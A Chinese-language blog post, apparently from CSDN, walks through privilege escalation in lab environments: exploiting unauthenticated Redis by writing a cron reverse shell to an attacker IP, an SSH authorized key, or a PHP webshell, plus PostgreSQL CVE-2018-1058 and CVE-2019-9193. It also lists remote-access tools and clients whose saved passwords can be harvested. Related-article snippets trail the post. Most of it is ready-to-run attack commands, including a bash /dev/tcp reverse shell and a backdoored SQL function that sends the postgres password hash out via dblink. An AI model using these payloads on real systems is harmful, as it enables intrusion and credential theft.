redies&postgres数据库提权&第三方软件或服务提权

最新推荐文章于 2024-05-28 15:18:53 发布
最新推荐文章于 2024-05-28 15:18:53 发布
阅读量405 收藏 1
点赞数
分类专栏: windows+linux提权 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129649960
版权

0x01 redies提权:

redies的未授权访问漏洞

影响版本:

redis 2.x,3.x,4.x,5.x

无密码登录或获取到了密码,且开了远程登录服务

共有三种利用方式

一、写入计划任务反弹shell

环境:centos的redis-3.2.11

redis-server redis.conf   #启动redies
redis-cli -h 192.168.85.143        #登录redis
set x "\n* * * * * bash -i >& /dev/tcp/192.168.85.129/4455 0>&1\n"
config set dir /var/spool/cron/crontabs
config set dbfilename root
save

kali监听:

nc -lvnp 4455

成功获取会话:

二、写ssh公钥利用私钥登录

环境:centos的redis-3.2.11

mkdir /root/.ssh   #创建密钥存放位置

生成公钥和私钥,把密码设置为空

ssh-keygen -t rsa

把公钥写入1.txt,并利用redis上传到centos靶机中

(echo -e"\n";cat id_rsa.pub;echo -e "\n")>1.txt  
cat 1.txt|redis-cli -h 192.168.85.143 -x set crack

登录redis,把目录设置一下

redis-cli -h 192.168.85.143
config set dir /root/.ssh
config set dbfilename authorized_keys
save

ssh使用私钥登录:

ssh -i id_rsa root@192.168.85.143

成功免密登录:

三、向网站根目录写入webshell

环境:kali的redis-3.2.0

redis-server /etc/redis.conf   #启动redies
redis-cli -h 127.0.0.1         #登录redis
config set dir /var/www/html  #设置WEB写入目录
config set dbfilename test.php #设置写入文件名
set test "<?php phpinfo();?>"  #设置写入文件代码
bgsave                         #保存执行
save                           #保存执行
#在外面执行
systemctl restart apache2      #开启web服务器

0x02 postgres

一.CVE-2018-1058

环境:vulhub

1.普通用户植入后门

#登录数据库 
psql --host 192.168.85.128 --username vulhub
vulhub

创建后门

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.85.128 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

管理员操作数据库时触发:

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

监听端口:

nc -lvnp 5433

二.CVE-2019-9193

环境:vulhub

高权限用户,数据库管理员

连接数据库

#登录数据库 
psql --host 192.168.85.128 --username postgres
postgres

执行命令

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

0x03 第三方软件或服务

远控类:Teamviewer 向日葵 Todesk VNC Radmin 等

密码类:各大浏览器 Xshell Navicat rdp 等

服务类:FileZilla Serv-u Zend等

通过cs插件来获取相关的信息(密码)

teamview

权限需要高一些,如果是iis的低权限用户,会获取不到

navicat:

向日葵

运行脚本进行解密

参考文章:

Redis未授权访问漏洞Getshell - FreeBuf网络安全行业门户

Redis未授权访问漏洞复现 - FreeBuf网络安全行业门户

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
升】61 Redis Postgresql数据库
(∪.∪ )...zzz的博客
08-04 430
目录redis数据库升Redis未授访问漏洞利用1. 利用计划任务执行命令反弹shell2. 写ssh-keygen公钥后 使用私钥登录3. 往web路径写webshell修复方案-漏洞成因PostgreSQL数据库建立连接、漏洞利用,Windows2008&amp; 7 令牌窃取升-本地Windows2003&amp; 10 进程注入 redis数据库升 redis非关系式,分布式 redis服务因配置不当,可被攻击者恶意利用 黑客借助redis内置命令,可将现有数据恶意清空
第100天:升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务
最新发布
weixin_71529930的博客
06-03 720
cs的欧拉插件里面也有自动取密码的模块,iis用户貌似是无法执行的,其他得有个普通用户的限。运行以后这里由于版本问题,旧版的向日葵已经无法正常运行了,而新版的做了完整的限制。这里只能看到验证码,看不到识别码,主要学习思路,万一遇到了符合的版本就ok。利用cs时先生成后门,反弹shell这里不再赘述,不会的去翻看前面的文章。也可以利用这个msf进行破解,首先先生成后门建立连接,这里就不过多赘述。利用工具cs的欧拉插件,欧拉插件的下载地址。注意一定是在这个会话下,执行下面的命令。利用命令进行连接数据库
PostgreSQL 数据库的几种方法——教程
W小哥
12-02 2891
一、漏洞描述 二、漏洞原理 三、环境搭建 四、漏洞复现 五、漏洞修复
PostgreSQL数据库
m0_64481831的博客
05-28 704
postgreSQL是一个功能强大对象关系数据库管理系统。
Postgres数据库缓存的深度指南
02-26
本文虽以Postgres为例,但也可对应到其他数据库系统。不同的计算机部件有着不同的运行速度。人类在理解数字的规模上面,与计算机有着极大的差距。对此,通过下面这张表格(截取自《文字间的无限空间》...
通用数据库代理服务: 设计文档 接口规范 运行配置等
02-24
基于C 语言的通用数据库服务,分为客户端动态库和服务端池服务, 支持 oracle db2 mysql postgres dameng gbase 等, 内部支持odbc/ado/oci/pqlib/gci/mysqlcapi 等接口 。 支持通知,支持表同步,表缓存等, 支持...
postgres数据库数据探查
07-20
本资源使用python进行编写,解压后在pycharm中进行使用,该探查数据库适用于postgres数据库,运行结束后以.xlsx格式进行保存,探查的内容有:数据库名称、数据表名称、数据表注释、排序、字段名称、字段注释、字段...
IDEA连接postgressql数据库操作
09-07
在本文中,我们将深入探讨如何使用IntelliJ IDEA(IDEA)连接到PostgreSQL数据库以及相关的配置步骤。PostgreSQL是一种强大的开源关系型数据库系统,而IDEA作为一个强大的Java开发集成环境,供了方便的数据库管理...
Postgres数据库操作命令大全.txt
11-17
针对Postgres服务器端常用操作命令汇总 由于本人经常操作Postgres数据库养成笔记习惯 所以整理了一下针对数据库操作的各种命令
升-MSSQL&PostgreSQL
m0_65336233的博客
12-06 706
数据升知识
PostgreSQL 漏洞 CVE-2018-1058 漏洞复现
ADummy的博客
03-07 625
PostgreSQL 漏洞(CVE-2018-1058) by ADummy 0x00利用路线 ​ 普通用户连接到数据库&gt;注入危险代码—&gt;等待超级用户登录触发后门—&gt;收到敏感信息 0x01漏洞介绍 ​ PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 影响版本 PostgreSQL &lt; 10 0x02漏洞复现 我们先通过普通用户vulhub:vulhub
升之数据库——Redis和PostgreSQL方式
m0_61506558的博客
10-17 702
通过之前对Access、MSSQL(SQL server)和Mysql注入的介绍,大家对数据库方式有了一定的认知,我认为耗时间的是Access,这和它开发的理念有直接的关系,而本次介绍的是Redis和PostgreSQL的,和之前利用的点很相似,会利用到系统自带独特的方式,主要集中在配置文件发生问题,进行反弹连接,进行渗透。——Win漏洞及数据库&AT&SC&PS__Cyber的博客-CSDN博客。
升-PostgreSQL数据库+第三方应用
xiaoheizi的博客
08-30 622
操作数据库限,数据库的增删改等,源码或配置文件泄漏,也可能是网站限(webshell)进行的数据库配置文件读取获得。查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统做准备。后台或网站限后的获取途径:后台(修改配置信息功能点),网站限(查看的配置文件获取),具体可以操作的事情大家自己想想。后台限,网站限,数据库限,接口限,系统限,域控限等。数据库备份泄露,源码泄漏,培植不当等或网站限获取后转入。
postgresql 分割_三分钟解析postgresql
weixin_35953704的博客
01-13 280
本头条号所分享文章仅供学习交流,请勿非法使用!近期遇到一些关于的问题,和大家分享一下~创建环境介绍docker中有一个COPY命令;COPY 在 PostgreSQL表和标准文件系统文件之间交换数据,该参数指示 PostgreSQL 服务器直接从文件中读写数据 COPY TO 把一个表的所有内容都拷贝到一个文件 COPY FROM 从一个文件里拷贝数据到一个表里(把数据附加到表中已经存在的内容...
攻防演练作为红方:postgresql之UDF ,及其好用的工具
keyboard专栏
04-28 679
在 PostgreSQL 中,用户定义的函数(UDF)是一种常见的限的方法,尤其是当你已经获得了数据库的访问限但需要更高级别系统限时。UDF 涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
第22篇:一次艰难的PostgreSQL不出网过程
ABC_123的博客
09-15 1142
Part1 前言在日常的内网横向过程中,对于SMB、Mysql、SSH、Sqlserver、Oracle等服务的弱口令爆破是常用手段,重复的红队攻防比赛使得这些服务的弱口令越来越少了。所以在平时,ABC_123也会关注一些其它服务的弱口令方法,有时候会在内网横向中收到奇效。本期就分享一个在内网渗透中,遇到的PostgreSQL数据库案例,过程非常艰辛,但是收获不少。首先简单介绍一下当时...
升】利用第三方应用Teamviewer&向日葵&Navivat-凭据
今天是几号的博客
02-18 766
远控类 利用向日葵漏洞 漏洞版本百度云链接 搭建: 为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy) 背景: 已有webshell限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务 tasklist /svc工具-CS 上传后门,会连会话,这里由于搭建原因忽悠是administrator限,当做是普通用户限,且无法正常至系统限 利用CS插件上传向日葵工具 上传 执行 机器密文就是验证码,使用Python高版
postgres 常用操作笔记
05-16
通过数据备份操作,我们可以将数据库中的数据和表结构保存到一个备份文件中,以防止数据丢失或损坏。而通过数据复原操作,我们可以从备份文件中恢复数据库中的数据和表结构。在PostgreSQL中,我们可以使用pg_dump...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值